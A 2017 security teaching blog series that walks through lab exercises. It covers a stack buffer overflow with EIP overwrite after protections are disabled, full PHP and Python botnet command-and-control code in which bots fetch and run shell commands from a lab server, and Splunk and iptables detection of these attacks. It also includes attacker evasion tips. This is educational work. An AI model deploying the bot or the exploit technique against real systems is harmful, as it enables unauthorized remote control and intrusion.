Thursday, December 7, 2017

Prepare, Bait, Hook, Execute and Control - Buffer Overflows

This post is the third of four that I am planning to write about social engineering specifically about phishing.  The form of phishing that I am going to talk about is where an email is sent to a user, a link or an attachment is in the email, it entices a user to click the link or open the attachment, executes a payload and then it provides control of the infected computer.

Here are the links to the previous 2 posts related to this topic:
Prepare, Bait, Hook, Execute and Control - Exploit Kits
Prepare, Bait, Hook, Execute and Control - Phishing

Lab

In the previous post, you read about exploit kits and how they work.  As described by Palo Alto, after a device hits a landing page that is infected, the device is then evaluated against a series of exploits to see which would work, the exploit is triggered and then the payload is delivered.  The exploit that was triggered was an Adobe Flash heap based buffer overflow (I think).

In the post below I would like to explore how an exploit would be discovered using fuzzing.  Then overwriting of a buffer to gain control of what is called an extended instruction pointer or EIP.  With being able to control the EIP change the next instruction to be executed to a command that I would like to execute.  This is different than the Adobe Flash heap based buffer overflow, however this is where you may need to begin to build a foundation of understanding.

1. The buffer overflow example I am going to demonstrate is a simple stack based buffer overflow.  This is a real simple example, but remember when you learned to ride a bike, you probably started with training wheels.

2. First we need to use a VM that is 32 bit.  I am going to use the Billu_b0x VM that we used previously.  The first step is you need to briefly change the network interface to be NATed and install gdb.

Command: apt-get update; apt-get install gdb

* Change the network interface back to host only when you are done.  Remember to not trust what you do not build and secure and even then be careful.

3. GDB is short for the GNU Debugger.  We will use it for looking at the registers and memory as we conduct the exercises below. Now let's build a vulnerable C program that we can utilize.  On the Billu_b0x, after I connected with SSH from my host, I created a directory called prog. 

Command: mkdir prog
Command: cd prog

4. Below is the vulnerable C program that I created and will be using.  I called the program c_prog.c.



#include 

int main(int argc, char *argv[])
{
 char buff[180];
 if (argc == 2) {
  strcpy(buff, argv[1]);
  if (strcmp(buff, "aS3cr3tP@ssword")) {
   printf("You shall not pass!\n");
  }
  else {
   printf("You may enter at your own risk...\n");
  }
 }
 else {
  printf("To login the syntax is: %s \n", argv[0]);
  exit (0);
 }
 return 0;
}
  


To step through the program.  I setup a character buffer of 180 characters.  Then I read in the first argument being the filename that I execute then the second argument being the password.  If I do not put a password in-place then it reminds me of the syntax that I need to use.  If the password does not match what I have, then it does not log me in.  If it does match then display a message in the console to enter at your own risk.


5.  After creating the simple program I compiled it using gcc.

Command: gcc c_prog.c

*The warnings that are displayed we will ignore for now.  If there are any errors please correct them by verifying your code.

6. If not specified, when you compile a program using gcc and you do not specify the output filename it will give the compiled program the name of "a.out".  Let's test "a.out" to verify it is working.



7.  Now I am going to fuzz the password field to see how long the buffer is.  To fuzz the password, we are not trying to guess it or brute force it.  We are trying to send various characters at different lengths to see if we can get it to crash.


8.  If you followed the commands that I executed above, first I sent 50 letter A's into the program as my password, then 100, 150 and 200.  When I reached sending in 200 it came back stating "stack smashing detected" and then displayed segmentation fault.  We can conclude that the buffer is between 150 and 200 characters long.  Let's try another round of fuzzing to see if we can be more precise on how long the buffer is.


9. From the above screenshot we can see that the buffer is now between 180 and 184 characters in length because it crashes on 185 characters.  After a little more research you can tell that the acceptable buffer length is 180 characters.

10.  Before we continue, we need to make a couple of adjustments to allow us to be able to complete the lab.  The first adjustment is, the Billu_b0x and modern day operating systems, have stack protection built-in.  This protection will randomize the placement of the stack in memory so that it is less predictable to overwrite and other protections exist also.  You can study more about that in your spare time.  As root execute the following command to disable the stack protector.

Command: sysctl kernel.randomize_va_space=0

11.  The gcc compiler also has protection built-in to protect the stack.  The following command will recompile the c_prog.c without the stack protector and will include the debuging information we need for future exercises.

Command: gcc -ggdb -fno-stack-protector c_prog.c

12.  After you complete steps 10 and 11 repeat step 7 to cause the "stack smashing detected".  You should see different results as shown below.



13.  Let's use gdb to demonstrate what we are trying to accomplish with smashing the stack. 

Command: gdb -q a.out
(gdb) list
(gdb) <enter>
(gdb) <enter>



14.  As you can see above we can list the code.  With compiling the c_prog.c with -ggdb we can see the source code in the debugger.  On line 10 we are copying our input into the buffer.  The buffer is built for 180 characters and we are going to push 500 characters into it.  This overflows the buffer.  To be able to see this in the debugger we are going to place a breakpoint on line 11.  A breakpoint will stop the execution of the program on that line.

(gdb) break 11                 OR                 (gdb) b 11 

* The breakpoint is not necessary, however it is a concept you need to know about gdb.

15.  Now to run the program we type run and then after put in the password that the program is looking for, exactly as if we were running it in the terminal.

(gdb) run testPassword


16.  Notice that the argv=0xbffff7f4 is set.  Then you can type step to then step through the rest of the program.  Eventually the program will terminate, but you should see, minus the code, what would be displayed in the terminal.

17.  Now let's run the program again inside of the debugger.  If you had to leave gdb and then rerun it to get back into gdb you will need to resetup the breakpoint on line 11.  This time we are going to overflow the stack using python to write 500 A's or 0x41 into the buffer.

(gdb) run `python -c 'print "A"*500'`




18.  Notice that the argv=0x41414141 or if you convert the hex to ASCII you notice that we have overwritten the argument with AAAA.  That means that I can control the program cause I can overwrite what is in memory because no bounds are placed to disallow me to put more information into the buffer than is specified.

19.  Let's rerun the program in the debugger with inserting exactly 180 A's into the buffer. We are going to examine the ESP register.  The esp is the extended stack pointer.  It points to the top of the stack.  So we are going to step through the program and then before it finishes we are going to examine 200 hexadecimal values starting at the ESP register.

(gdb) x/200x $esp


20.  In the above image you can see that we inserted into the stack the 180 A's.  To demonstrate smashing the stack or the goal of overwriting the EIP register, we are going to use the letter B.  This is so we can see it in the debugger.

(gdb) run python -c 'print "A"*180 + "B"*4'`
(gdb) step (3 times)
(gdb) x/200x $esp


21.  In the above image we are placing 184 characters into the buffer which overflows the designated size of the buffer.  In the above image your can see 0x42424242 to demonstrate where we overflowed the buffer.  Compare it to the image in step 19.  Notice in the image we had 3 0x00000000 now we only have 2.  If you step 2 more times in the code it will exit normally.

22.  Let's change from adding 4 B's to 8 B's.

(gdb) run python -c 'print "A"*180 + "B"*8'`
(gdb) step (3 times)
(gdb) x/200x $esp

23.  In the above steps we have talked about the esp register and the eip register.  If we can control the EIP register then we can modify the next instruction or code that is executed.  First let's learn how to display the registers in gdb.

(gdb) info registers           OR  (gdb) i r

24.  Repeat steps 20 through 23 until you can overwrite the EIP register as displayed below in the image.  Try and do it by adding 4 B's at a time.


25.  After you overwrite the EIP register examine from the ESP register as we did above.  We are looking for a memory address that may be consistent.  To speed up this process I am not going to set a breakpoint.


26.  Notice we need to take away 2 things.  The first is a memory address of where the A's are being placed consistently.  I am going to pick the following.

Memory Address: 0xbffff890          (Note: yours may be different)

Now go back and run the program in the debugger and verify that this address consistently has 0x41414141 next to it. 

27.  The next thing I need to calculate is how many A's into the 180 character buffer is the memory address.  We do not need to be exact as long as what we do equals 180.

Number of A's:  30

28.  So let's imagine that the code I want to execute is 50 hex characters long.  I would run the program in gdb with the following command, which would include my code indicated by the letter C.

(gdb) run  `python -c 'print "A"*30 + "C"*50 + "A"*100 + "B"*16'`


29.  Now that we can see that we have introduced the code, we want the EIP register to call the memory address 0xbffff890 and then the code would be executed.  To do this we need to modify the last 4 B's.  Without going into much detail the registers work in Little Endian format.  We need to write the memory address in little endian formal as shown below.

(gdb) run  `python -c 'print "A"*30 + "C"*50 + "A"*100 + "B"*12 + "\x90\xf8\xff\xbf'`



30.  Notice that we have controlled the EIP register and pointed to where we could place our code.  This is where I am going to end this.  However, if you would like to go further on generating a payload and learning more about exploit development study the following links.

Binary Payloads - Metasploit Unleashed

Corelan Exploit Writing Part 1

Also study about:
More and More and More about Smashing the Stack on Windows and Linux
Heap Spraying
Use-after-Free
....

Check out the pwn2own and other similar competitions.  Exploit development may be difficult to learn but it pays very well if you are great at it.

Monday, December 4, 2017

Prepare, Bait, Hook, Execute and Control - Exploit Kits

This post is the second of four that I am planning to write about social engineering specifically about phishing.  The form of phishing that I am going to talk about is where an email is sent to a user, a link or an attachment is in the email, it entices a user to click the link or open the attachment, executes a payload and then it provides control of the infected computer.

Here is the link to the first post called, "Prepare, Bait, Hook, Execute and Control - Phishing"

Lab

1. In the first port we explored what happens after a host is infected and how it can be controlled as a bot in a botnet.  This control can be conducted through a C2 server which is usually another infected device on the internet.  For this post we are going to evaluate what happens when a person clicks on a malicious link inside of an email or browses to a website that is infected.

2.  When someone visits an infected website it may redirect them to an exploit kit.  An exploit kit is used to establish control of the computer if a vulnerability exists.  I am going to now refer to the following site as a reference that you should read.  It defines what an exploit kit is, how it works and the different stages.  This site was created by Palo Alto.  Here is the link to "What is an Exploit Kit?".

3.  Now with the understanding of how an exploit kit works, I am going to refer you to another site.  The site Malware-Traffic-Analysis.net has a scenario that I would like you to work through.  The scenario is of how a computer became infected by visiting an infected site that led them to an exploit kit.

Before you start working on the scenario, skip to step 4 in this post and setup Security Onion as an Analyst VM.

Please answer and show your work based on the scenario presented.  Remember this is being written for a college class being taught soon.  Feel free to look at his answers he has placed on the site but I need the work submitted to be your own work.  Here is the link to the scenario on Malware-Traffic-Analysis.net.

Remember that the payload in the pcap that you are analyzing potentially contains malware.  Be careful with it..

4. To setup security onion so that you can replay the pcap you could build an Anaylsts VM as talked about in this post.

I apologize if most of you do not appreciate the references to other materials on my post.  I felt the references discussed and presented how an exploit kit works better than I could do it.

Enjoy...

Wednesday, November 29, 2017

Prepare, Bait, Hook, Execute and Control - Phishing

This post is one of four that I am planning to write about social engineering specifically about phishing.  The form of phishing that I am going to talk about is where an email is sent to a user, a link or an attachment is in the email, it entices a user to click the link or open the attachment, executes a payload and then it provides control of the infected computer.

To explore this topic, I am going to start by going through the process backwards.  I am going to start by first exploring how the control of the infected computer occurs as it becomes a bot.

I am going to use the zico2 virtual machine as if it was a web server on the internet.  My host as the controller of the bots through the web server and then will simulate some infected computers that communicate to the web server.

1.  We are going to use PHPLiteAdmin to create a SQLite3 database called command.  Then a table called botInfo with 6 fields as shown below in the screenshot. 

 
2.  Walking through the table, the machineID is the unique identifier of the bot, osType is whether it is linux or windows, httpCommand is the command that is pending to be run on the bot, httpResults are the results of the command, and executed if the httpCommand was executed.

3.  If you observe the permissions of the view.php file under /var/www the zico account has access to modify the file.  You need to figure out how to login with the zico account to continue with this exercise. 


4. Through the previous walkthrough we identified that the www-data user is being utilized to run the website.  With the above permissions this user also has the ability to modify the website.

Challenge: Correct the permissions so that the pages will still load but the www-data does not have permission to write to the www directory, the files and any directories.


5.  Let's modify the view.php file to be used as the file for our command and control (C2) server.



Below is the code that is above with exception to the first and last lines.  You may need to reformat the code as you copy it out.


        if ($_GET['page']) {
                $page =$_GET['page'];
                include("/var/www/".$page);
        }
        elseif ($_GET['action']) {
                $action=$_GET['action'];
                if ($action=='getCommand') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=getCommand&mID=test
                        $machineID=$_GET['mID'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = 'SELECT id, httpCommand FROM botInfo WHERE machineID="' . $machineID . '" AND executed="N" LIMIT 1';
                        $results = $db->query($query);
                        if (count($results) > 0) {
                                while ($row = $results->fetchArray()) {
                                        echo $row[0] . "|" . $row[1];
                                }
                        }
                        else {
                                echo "Nothing";
                        }
                }
                elseif ($action=='addBot') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=addBot&mID=test27
                        $machineID=$_GET['mID'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = "INSERT INTO botInfo (machineID, httpCommand, executed) VALUES('" . $machineID . "','" . base64_encode('ls') . "','N')";
                        echo $query;
                        $results = $db->exec($query);
                        echo "Added";
                }
        }
        elseif ($_POST['action']) {
                $action=$_POST['action'];
                if ($action=='postCommand') {
                        # Example to test with: curl -d "action=postCommand&mID=test&id=1&httpResults=test9" -X POST http://172.16.216.132/view.php
                        $machineID=$_POST['mID'];
                        $id=$_POST['id'];
                        $httpResults=$_POST['httpResults'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = 'UPDATE botInfo SET httpResults="' . $httpResults . '", executed="Y" WHERE id=' . $id . ' AND machineID="' . $machineID . '"';
                        $results = $db->exec($query);
                        echo "Completed";
                }
        }
        else {
                echo "view.php?page=tools.html";
        }

6.  Quickly I will step through the code above.  The page initially would allow you to pass the parameter of page with the tools.html file.  This could also be used to conduct directory traversal to access files throughout the file system that the www-data user could read.

We added if the parameter action with the value of getCommand and mID (machineID) was passed then we would query the sqlite3 database for the 1st command that needed to be executed on the infected host.  Then return it as if it was the web page viewed in a web browser.  Remember information passed as a GET parameter, will by default show in the logs of the web server.

The other action is to add a new bot to the database.  This is if a new computer comes on that is infected with our proof-of-concept executable.

The second section is if the POST parameter of action with it being postCommand, would indicate the bot executed the given command and is returning through the httpResults the results of the command.  Then return as a web page that the action was "Completed".

7.  Well that was simple.  Let's move on.  We are now going to create the bot, this would be proof-of-concept code that would run on an infected computer to control it.  I am going to utilize python. 

8. Below is the code for a python bot that will communicate with the PHP page called view.php. 




#!/usr/bin/python
# Building this bot to only work with linux
# Built for educational use only...

import base64
import hashlib
import random
import datetime
import urllib
import urllib2
import time
import subprocess

c2server="http://172.16.216.132/view.php"
sleepTime = 10 # Sleep for 10 seconds between requests going to the c2server

def generateMachineID():
 # This function generates a random machine ID based on the time and a random number
 machineID = str(datetime.datetime.now()) + str(random.randint(1,10000)) 
 machineID = hashlib.sha1(machineID).hexdigest() # Will return as machineID
 return machineID

def addBot(mID):
 # This function adds the bot to the C2Servers SQLite3 database
 url = c2server + "?action=addBot&mID=" + mID
 urllib2.urlopen(url).read()

def getCommand(mID):
 # This function gets the next command from the C2 to execute
 url = c2server + "?action=getCommand&mID=" + mID
 u = urllib2.urlopen(url)
 i = u.read()
 info = i.split("|")
 print "Received - Task ID: " + info[0] + "\tCommand: " + base64.b64decode(info[1])
 return info[0], info[1]

def execCommand(c):
 # This function takes the command it received and eecutes it
 c = base64.b64decode(c)
 comExec = subprocess.Popen(str(c), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
 STDOUT, STDERR = comExec.communicate()
 if STDOUT:
  encodedOutput = base64.b64encode(STDOUT)
 else:
  encodedOutput = base64.b64encode("Invalid Command...")
 return encodedOutput

def postCommand(mID, tID, r):
 # This function returns to the c2server the results of the command
 url = c2server
 data = urllib.urlencode({'action' : 'postCommand',
     'mID' : mID,
     'id' : tID,
     'httpResults' : r})
 u = urllib2.urlopen(url=url, data=data)

def main():
 machineID = generateMachineID() # Generate a random machine identifier
 addBot(machineID)  # Communicate to the C2 Server and Add this bot
 while True:   # Don't exit until program fails
  time.sleep(sleepTime) # Wait for the specified time 
  taskID, command = getCommand(machineID) 
  if base64.b64decode(command)=='Nothing':
   time.sleep(sleepTime*3)
  else:
   time.sleep(sleepTime)
   results = execCommand(command)
   time.sleep(sleepTime)
   postCommand(machineID, taskID, results)

if __name__ == "__main__":
 main()        

To talk through the code.  It generates a unique machine ID, then adds the bot machine ID to the database housed on the site, gets a command if it exists, executes the command and then posts the results back to the site.

9.  The bot if configured correctly will persist on the system and be triggered to start or restart based on a scheduled task or an action taken by the user.

10.  Awesome, now we need an administration script to manage what commands we want the bots to execute, fetch the results and remove the tasks from the SQLite3 database to keep it cleaned out.  This will require us to add to the view.php page and build a new python script to conduct the actions.

Below is the python script for the administration of the bots through view.php.




#!/usr/bin/python
# Building this utility to only work with linux
# Built for educational use only...

import base64
import urllib
import urllib2

c2server="http://172.16.216.132/view.php"
sleepTime = 10 # Sleep for 10 seconds between requests going to the c2server
log = open('log.txt','a')

def getExecuted():
 # This function gets the machine IDs that are in the database
 url = c2server + "?action=getExecuted"
 u = urllib2.urlopen(url)
 i = u.read()
 items = i.split('|')
 if items[1] == "Nothing":
  print "No commands executed to be return..."
  return "Nothing"
 else:
  print "Task ID: " + items[0] 
  print "Bot ID: " + items[1]
  print "$> " + base64.b64decode(items[2])
  print base64.b64decode(items[3])
  print
  # Record to a log file for future reference...
  log.write("BotID: " + items[1] + "\n")
  log.write("?> " + base64.b64decode(items[2]) + "\n")
  log.write(base64.b64decode(items[3]) + "\n\n")
  return items[1]
 return "Nothing"
 
def selectBot(botList):
 count = 1
 for b in botList:
  print str(count) + ". " + b
  count=count+1
 print
 select = raw_input("> ");
 botNumber = int(select) - 1
 return botList[botNumber]

def sendCommand(b):
 command = raw_input("Command> ")
 url = c2server + "?action=sendCommand&mID=" + b + "&httpCommand=" + base64.b64encode(command) 
 urllib2.urlopen(url).read()
 print
 print "Sent the command: " + command
 
def purgeOld():
 url = c2server + "?action=purge"
 urllib2.urlopen(url).read()
 print
 print "Sent command to purge old information."

def main():
 bots = []
 botSelected = 'None'
 while True:
  print
  print "C2 Server URL: " + c2server
  print "1. Get Executed Commands"
  print "2. Select Bot - Currently Selected: " + botSelected
  print "3. Send Command to Execute"
  print "9. Purge Old Commands"
  print "Q. Quit"
  print
  selection = raw_input("> ")
  if selection == "1":
   newBot = getExecuted()
   if newBot <> "Nothing":
    if newBot not in bots: 
     bots.append(newBot)
     print "Added bot: " + newBot
  elif selection == "2":
   botSelected = selectBot(bots)
  elif selection == "3":
   sendCommand(botSelected)
  elif selection == "9":
   purgeOld()
  elif selection.lower() == "q":
   log.close()
   exit(0)

if __name__ == "__main__":
 main()        


To walk through the above code.  You are presented with a menu.  If bots are running you can retrieve the executed commands.  The command is displayed and logged if available.  Then you can select the bot and then send commands back to the database to be executed.  You can also purge old commands.

11.  Now that we have a script to administrate the bots, let's add to the view.php file the following 3 sections underneath the addBot elseif.




                 elseif ($action=='sendCommand') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=sendCommand&mID=test27&httpCommand=dddd
                        $machineID=$_GET['mID'];
                        $command=$_GET['httpCommand'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = "INSERT INTO botInfo (machineID, httpCommand, executed) VALUES('" . $machineID . "','" . $command . "','N')";
                        $results = $db->exec($query);
                        echo "Added Command";
                }
                elseif ($action=='getExecuted') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=getExecuted
                        $db = new SQLite3('/usr/databases/command');    
                        $query = "SELECT count(*) FROM botInfo WHERE executed='Y' LIMIT 1";     
                        $results = $db->query($query);
                        while ($row = $results->fetchArray()) {
                                $rows = $row[0];                # Calculate the rows returned by the query
                        }
                        if ($rows > 0) {                        # If number of rows is greater than 0 then continue
                                $taskID = 0;
                                $query = "SELECT id, machineID, httpCommand, httpResults FROM botInfo WHERE executed='Y' LIMIT 1";
                                $results = $db->query($query);
                                while ($row = $results->fetchArray()) {
                                        echo $row[0] . "|" . $row[1] . "|" . $row[2] . "|" . $row[3];
                                        $taskID = $row[0];
                                }
                                $query = "UPDATE botInfo SET executed='D' WHERE id=" . $taskID;
                                $results = $db->exec($query);
                        }
                        else {
                                echo "Nothing|Nothing|Nothing|Nothing";
                        }
                }
                elseif ($action=='purge') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=purge
                        $db = new SQLite3('/usr/databases/command');
                        $query = "DELETE FROM botInfo WHERE executed='D'";
                        $results = $db->exec($query);
                        echo "Purged";
                }       

To walk through the above commands added to view.php.  Send command is where the admin console sends in a command to be run by a specific bot or machineID.

The getExecuted action is to gather and return commands that have been executed.

Then the action of purge will purge the rows in the database that have been executed and returned to the admin console.

12.  Now let's test our proof-of-concept.  I am using my host to launch a program called "Terminator".  Terminator allows you to split the window into multiple terminal windows.  Below are screenshots of the admin console and 4 bots running on my host simulating a small botnet.  Also what the SQLite3 database looks like.

The 4 bots communicating:


The admin console communicating with the 4 bots through the web page:


What the SQLite3 database looks like:


13.  Now that we can simulate a botnet let's see what it looks like in Splunk as the logs from the web server are read by the forwarder.

Challenge:  Setup the botnet with a simulation of 4 bots, the zico2 vulnerable web server and an admin console.

Challenge:  Setup the Splunk Forwarder to send the logs to a Splunk Server docker instance.  Study the logs and identify the bot activity.

14.  Understanding that if a web site if compromised a miscreant may change files.  This is where a file integrity monitor (FIM) solution is helpful.  On of the many tools is called OSSEC.  You can setup OSSEC to record a log file and then the Splunk Forwarder can send the logs.

Challenge: Setup OSSEC to watch the /var/www directory for file changes.  Change view.php and then resave it and verify that the log detects it.

Challenge: Setup Splunk to receive the OSSEC logs.

The files that were created above can be pulled from my Github page located at here.

Challenge: What is pivoting, as it is defined in penetration testing?

Challenge: If you had the access that the bot has what would you look for to escalate privileges.

The goal of the post is for you to understand how a botnet may function, how a C2 Server may function and then tools and techniques that you can use to detect a bot or detect when a site has been compromised.

Friday, November 24, 2017

Docker with Splunk and Seattle 0.0.3 Walkthrough

For this post, I am going to quickly walk through the setup of Splunk using a docker image, refer to the previous post for detail on how to do this.  With Splunk configured I am going to go back to the walk-through of Seattle 0.0.3, configure the logs to come in, and then we are going to go through the walk through and see what logs are being generated.

The goals of this post are:
1.  To show how analysts could detect the attack occurring using a SIEM
2.  To show what the attack/walkthrough would look like in a SIEM
3.  To learn about additional tools that you can use to conduct or mitigate the attack.

Lab

1. In the previous post I walked through setting up a docker image called splunk/splunk and installing a Splunk Forwarder on the vulnerable image I was working with.  I am going to conduct the same with the Seattle 0.0.3 vulnhub VM.

2. My setup quickly is a VM running Kali Linux (172.16.216.130) with docker running.   I am running the docker image for Splunk (172.17.0.2) on Kali.  The networking on the Kali VM is setup to be host-only.  From my linux host I can reach the 172.16.216.130 VM.  I am going to use the hosts IP Address and NAT the ports I need for Splunk.  On the Kali VM I have ssh enabled and connecting with the "-X" option to be able to X11 forward everything to my host.

Command on Kali to Start SSH: /etc/init.d/ssh start
Command on Host to Forward X11: ssh -X root@172.16.216.130

4.  Then I started the docker service and loaded the splunk image.

Command: service docker start
Command: docker run -it -p 172.16.216.130:8000:8000 -p 172.16.216.130:9997:9997 splunk/splunk

5.  Then I load as a second VM the Seattle 0.0.3 (172.16.230.131).  Observe that this VM is 64 bit.  I need to transfer the Splunk Forwarder to this VM.  In the previous post I used Secure Copy using SSH.  In this post I am going to use a Python SimpleHTTP Web Server to host the files and then pull them from the Seattle VM.  I use this method to transfer or load files occasionally when I am working on vulnerable images.

First: Navigate to the directory of where the files are that you need to host in a simple web server.  In the below example I have a folder called Splunk with the 32 and 64 bit splunk forwarders.  Observe that this VM is built on Fedora 64bit so you need the rpm package of the Splunk Universal Forwarder.  The Simple Server will serve all of the files in the given directory.

Command: python -m SimpleHTTPServer
Note: You can follow the command with a specific port number.  By default it serves the files on port 8000.



6.  Pull the file that you need from the Seattle 0.0.3 virtual machine using bash.  Assuming you have root on the Seattle VM through SSH.  I built a script in bash to demonstrate using native bash commands to download the file.  You can really simplify the below script if you need to...

Challenge: Create the script, change permissions, execute it, and download the Splunk Universal Forwarder for Fedora/Red Hat.


7.  The VM has a keyboard layout is for a GB keyboard layout.  You can change this by modifying 2 files listed below, however as an attacker if you do make the change make sure you change it back.  I often find that attackers do a fair job in cleaning-up but often miss these small things that they change.  Google how to change the keyboard layout in Fedora as part of the challenge.

/etc/locale.conf
/etc/vconsole.conf

8. Install the Splunk Universal Forwarder.

Command: rpm -ivh sf.rpm


9.  After Splunk is installed setup the forwarding server to the Splunk docker image on the Kali VM (172.16.216.130) that has the ports NATed.

10.  Enable logging for queries in the MariaDB server that is running.



11.  Then restart the service in Fedora for the mariadb server.

Command:  systemctl restart mariadb.service

12.  Now add the following files so that the Splunk Universal Forwarder can send them to the Splunk server running on the Kali VM.

/var/log/mariadb/error.log
/var/log/mariadb/query.log
/var/log/httpd/access_log

13.  Before we move on, let's work with the iptables firewall that is running to generate logs of the activity.  On this VM in the /root home directory is a script called "shieldsup.sh".  We are going to copy and then modify that script to keep it simple.

Command: cp shieldsup.sh v2.sh



14.  Modify the v2.sh file with adding logging into the script that will configure the iptables firewall.  Below is how I modified it.  The firewall could be simplified both by consolidating the logging policies and using bash foor loops.


15.  The logs for the firewall will show inside of the file /var/log/messages.  If you were to capture a few of them, below is a screenshot of what you would see.


16.  Setup the Splunk Universal Forwarder to also read and send these logs to the Splunk server: /var/log/messages.  Below is a scrennshot of the monitors I have enabled for the Seattle 0.0.3 VM.


17.  Run a nmap scan on the Seattle VM to verify you are receiving logs.  Also verify the script you wrote for the firewall logging is executed.

18.  Verfiy in Splunk that you are receiving the iptables, httpd and mysql logs.


19.  Now going to the walkthrough, let's start by scanning with netcat.


20.  Use the Splunk Search like you would conduct a google search.  Run the following search:

Search: index=main DPT=76

Search the main index of Splunk and then search for the string DPT=76 amongst the logs.  DPT is an abbreviation of destination port.  You should see the results of the search similar to what is below.  In step 19 we scanned destination port 76.


21.  You can also do conditional statements in your searches.  For example if I wanted to see the logs that were generated of scans going to the destination ports of 76 and 77.

Search: index=main (DPT=76 OR DPT=77)



22.  Now we are going to request the home page of the web site using netcat.

Command: nc 172.16.216.131 80
String: GET / HTTP/1.0

23.  Looking in Splunk we see the following logs.  After we search specifically for the log source of /var/log/httpd/access_log

Search: index=main source="/var/log/httpd/access_log"


 
Looking closer at the log normally where the user-agent is you see a "-".  If you have a web application firewall or another method to filter by a <blank> user-agent you could block this scan.  (Apache Web Server has filtering capabilities that could be utilized also.)

24.  Now we are going to use OWASP dirbuster and hit the home page.  Observe that each hit records a log entry.  Also in the user-agent you can see, we are utilizing OWASP Dirbuster.


Challenge: Identify how to change the user-agent in dirbuster.

25.  Let's configure iptables to observe the new connections coming into the firewall on port 80.  If the connection is NEW and hits the firewall 5 times within 120 seconds then log and drop the connection.

Change the firewall script on the Seattle 0.0.3 VM and set it.  Pay particular attention to how the LOG-ACCEPT-INPUT-NEW policies are created.  I copied the previous firewall script to a new one, so if I had to I could revert to it.

Note:  If you make changes to the firewall script, you need to run ./shieldsdown.sh and then ./v3.sh to reset the counters maintained by iptables that the IP Address should be blocked.



26.  If the firewall is setup and functioning correctly you should see that dirbuster observed multiple timeouts while it was scanning, due to it being blocked.  Dirbuster will now pause and wait.


27.  If you search in Splunk you will see the behavior of the connection to change from LOG ACCEPT INPUT NEW to LOG DROP INPUT. 

Search: index=main DPT=80


28.  Let's specifically look at the Splunk logs for /var/log/httpd/access_log.  I modified the user-agent to have a unique user-agent.  Notice the search only returns a scan that resulted in 303 logs verses a potential of thousands of logs.  Also in the search I specified the log source and a string to search for that would be unique in the logs. 

Search: index=main source="/var/log/httpd/access_log" "DirBuster-1.0-RC1-iptables-test2"


Being able to search using an attackers IP Address, a unique user-agent or other information that you can find is unique about an attack is worth gold in finding an attacker and what they have done.  You can also associate multiple IP Addresses to an attack that is occurring.

On the attackers side, you should try and stay hidden.  Learn how to decrease the amount of generated traffic and learn how to fit in with existing traffic.  I have heard this called "flying beneath the radar" or trying not to draw attention to yourself.

29.  The next step in attacking the Seattle 0.0.3 VM was to fuzz the password of the user. 

Challenge:  Fuzz the password for the admin user and observe if the iptables rules that we put in-place above will mitigate this attack also.

30.  The next item was to create stored XSS in a post to the blog after you log in as admin. 

Challenge:  Create a search in Splunk to identify XSS by searching for the keyword script or alert.











Monday, November 20, 2017

Docker with Splunk and Billu B0x forwarding Apache2 and mysql logs

For this post, I am going to walk through the setup of Splunk using a docker image.  With Splunk configured I am going to go back to the walk-through of Billu b0x, configure the logs to come in, and then we are going to go through the walk through and see what logs are being generated.

The goals of this post are:
1.  To show how analysts could detect the attack occurring using a SIEM
2.  To show what the attack/walkthrough would look like in a SIEM
3.  To learn what you could change in the attack/walkthough to be more stealthy in the methods utilized and how tools are used

Lab

1.  On my Kali box where docker is installed, start the service.

Command: service docker start

2.  Then search for docker images for the keyword "splunk"

Command: docker search splunk

3.  The image that I selected is called splunk/splunk.  So I am going to pull down that image.  We are trying to get version 7 of splunk.

Command: docker pull splunk/splunk

4.  After pulling the image we are going to run it.  However, prior to doing that, Splunk uses port 8000 for the web interface and also needs port 9997 for a splunk forwarder (agent) to send logs to the server. (The ports can be changed.)  With the docker image installed on Kali, the image will receive by default a 172.17.0.2 IP Address.  Billu_b0x will be in a virtual machine that will not have access to that IP Address unless we associate the ports to the IP Address of Kali.  To do that, use the -p command line switch to indicate the IP Address you want to bind to, the listening port on that IP Address forwarded to the port on the image.

Command: docker run -it -p 172.16.216.130:8000:8000 -p 172.16.216.130:9997:9997 splunk/splunk


5.  When the image loads it will have you agree to the End-User License Agreement.  After it completes loading then it will display a blinking cursor.  Use the key combination of Ctrl <p> <q> to exit out of the image while leaving it running.

6.  Because we associated the Splunk web interface with an IP Address that the host of my Kali VM can get to, let's navigate to the splunk login page on port 8000.  (You should change the password, but remember being a docker image you will loose everything when you kill the instance of the image.

URL: http://172.16.216.130:8000



7.  Then setup a receiver to listen on port 9997.  Click settings in the top right, then select forwarding and receiving.  Then click add new to receive data.  Insert port 9997 for the default port.



8.  Now, we need to load the Billu_b0x VM.  If you do not know the root password, go back and work through the VM and figure out the password.  Go ahead and login to the console and start the SSH server.

Command: /etc/init.d/ssh start

9.  Connect to the VM from the host through SSH.  This will simplify the configuration.

Command: ssh root@172.16.216.129

10.  Download the "Universal Splunk Forwarder" to the host.  This VM requires the 32 bit deb package.  After you download the file, similar to this, splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb, copy this over to the Billu_b0x VM.

11. In a new terminal window, let's copy the file over to the VM.  To do this you can use WinSCP on windows or scp on Linux.  I am going to demonstrate using scp. 

Command:  scp splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb root@172.16.216.129:/root

Walking through the command, secure copy the file by using the account of root to the IP Address listed and place the file in the /root directory.

12.  Then go back to the SSH session you established on step 10.  Then install the splunk forwarder.

Command:  dpkg -i splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb

13.  Now that the forwarder is installed, we need to configure it so send logs to 172.16.216.130:9997 or the Kali box on port 9997 which then sends it to the docker image of splunk.

Command: /opt/splunkforwarder/bin/splunk add forward-server 172.16.216.130:9997


14. Verify the forward-server is configured.

Command: /opt/splunkforwarder/bin/splunk list forward-server

You shoud see it listed under inactive forwarders.  Don't worry about this yet.

15.  Now you need to add which files or directories you would like to send to Splunk.  The main reason you want to send your logs to a SIEM or central location is a miscreant will tamper with them or delete them on the box.

16.  Let's add the logs for the apache2 server for the access.log and the error.log.

